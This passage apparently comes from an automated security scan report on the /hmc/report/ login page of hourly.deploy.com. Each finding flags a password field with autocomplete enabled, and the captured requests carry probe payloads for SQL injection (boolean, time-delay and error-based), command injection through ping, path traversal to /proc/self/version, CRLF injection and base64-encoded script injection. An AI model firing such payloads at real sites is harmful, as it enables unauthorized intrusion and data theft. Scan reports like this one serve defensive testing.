Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:41 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:41 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=%27%22%20ns=%20netsparker(0x000012)%20" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.73. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/ HTTP/1.1
Host: hourly.deploy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:30 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=d8308cb242bf2b615f7a;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:30 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:30 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:39:30 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4789


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.74. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt=;ns:expression(netsparker(0x00003E)); HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:49 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:49 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=;ns:expression(netsparker(0x00003e));" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.75. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1+OR+X%3d'ss HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1+OR+X%3d'ss" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.76. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%27));WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27));WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.77. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=(SELECT%20CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(SELECT%20CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97)))" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.78. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt='%3E%3Cnet%20sparker=netsparker(0x000025)%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:46 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:46 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt='%3e%3cnet%20sparker=netsparker(0x000025)%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.79. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='+OR+'ns'%3d'ns HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='+OR+'ns'%3d'ns" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.80. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%26ping%20-c%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%26ping%20-c%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.81. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%27%26%20SET%20%2FA%200xFFF9999-2%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:36 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:36 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27%26%20SET%20%2FA%200xFFF9999-2%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.82. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.83. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=data%3A%3Bbase64%2CJyI%2bPHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDBEKTwvc2NyaXB0Pg%3d%3d HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=data%3A%3Bbase64%2CJyI%2bPHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDBEKTwvc2NyaXB0Pg%3d%3d" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.84. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%0D%0Ans:netsparker056650=vuln HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%0D%0Ans:netsparker056650=vuln" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.85. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../proc/self/version HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/version" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.86. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%22%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%22" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.87. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='%2BNSFTW%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%2BNSFTW%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.88. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='+OR+'1'%3d'1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='+OR+'1'%3d'1" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.89. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=NSFTW HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=NSFTW" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.90. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
